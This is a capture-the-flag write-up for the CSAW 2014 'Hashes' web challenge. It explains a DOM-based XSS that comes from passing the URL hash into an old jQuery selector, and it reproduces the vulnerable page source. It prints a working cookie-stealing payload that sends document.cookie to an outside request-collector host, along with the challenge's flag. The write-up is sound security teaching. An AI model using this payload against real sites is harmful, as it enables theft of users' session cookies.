CSAW14 – Hashes (Web 300)

September 24, 2014

Writeup by mooh

Description:

location, location, location
http://54.86.199.163:7878/
Written by ColdHeat

 

Screenshot of the challenge website

 

One of three available pictures

We have a website with 3 links which show pictures of cats and dogs when we click on them.

There is a form as well where we can enter an url and the bot will click on it. It sounds like a XSS challenge. Let’s see if the bot clicks on every link. For that I will use the service http://requestb.in/. This is their service description: “RequestBin gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way.” So no need to setup a web server. Just enter a RequestBin url and see the results: we got a request from 54.86.199.163 User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.7 Safari/534.34.

First idea: The link we send is inserted in a HTML page (<a href=“…”>) and the bot clicks on the link. So we would try to escape from the link to write some javascript code to add the cookie.
But tests with http://requestb.in/1d372eg1?c=bla” and http://requestb.in/1d372eg1?c=bla’ are unsuccessful, the quote and double quotes are part of the parameters…

Another look at the source code [0] shows that there is some javascript responsible for showing an image when we click on the links. It uses window.location.hash and this value is directly used in $(). Sounds like DOM-XSS. But window.location.hash starts with a “#” so it is not so easy to exploit. Lucky for us, the jQuery library used is quite old and vulnerable to DOM-XSS.
So let’s write a cookie stealer in the hash:

http://54.86.199.163:7878/#<img src="bla.jpg" onerror="document.location= 'http://requestb.in/1d372eg1?c=' + document.cookie”>

We check our RequestBin and voila

Querystring:
c: win=”flag{these_browser_bots_are_annoying}

 


 

[0]

<!DOCTYPE html>
<html>
<head>
 <title>CSAW</title>
 <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.js"></script>
 <style type="text/css">
 .image {
 display: none;
 }
 img {
 width: 400px;
 }
</style>
</head>
<body>
 <a href="#bowtie">bowtie</a>
 <a href="#fluffy">fluffy</a>
 <a href="#beanie">beanie</a>
<div class="image" id="bowtie"><img src="http://i.imgur.com/C9tanfn.jpg"></div>
 <div class="image" id="fluffy"><img src="http://i.imgur.com/oAdF86F.gif"></div>
 <div class="image" id="beanie"><img src="http://i.imgur.com/Uc738dz.jpg"></div>
<div id="message">
 <p>Send me cool links to images!</p>
 <p>There is a bot that checks these links and he kind of unhappy<p>
 <form method="POST" action="/message">
 <input type="text" name="message">
 <input type="submit">
 </form>
 </div>
</body>
<script type="text/javascript">
 $(window).bind( 'hashchange', function(e) { 
 $('.image').hide()
 tag = window.location.hash
 $(tag).show()
 });
 tag = window.location.hash
 $(tag).show()
</script>
</html>

Leave a Reply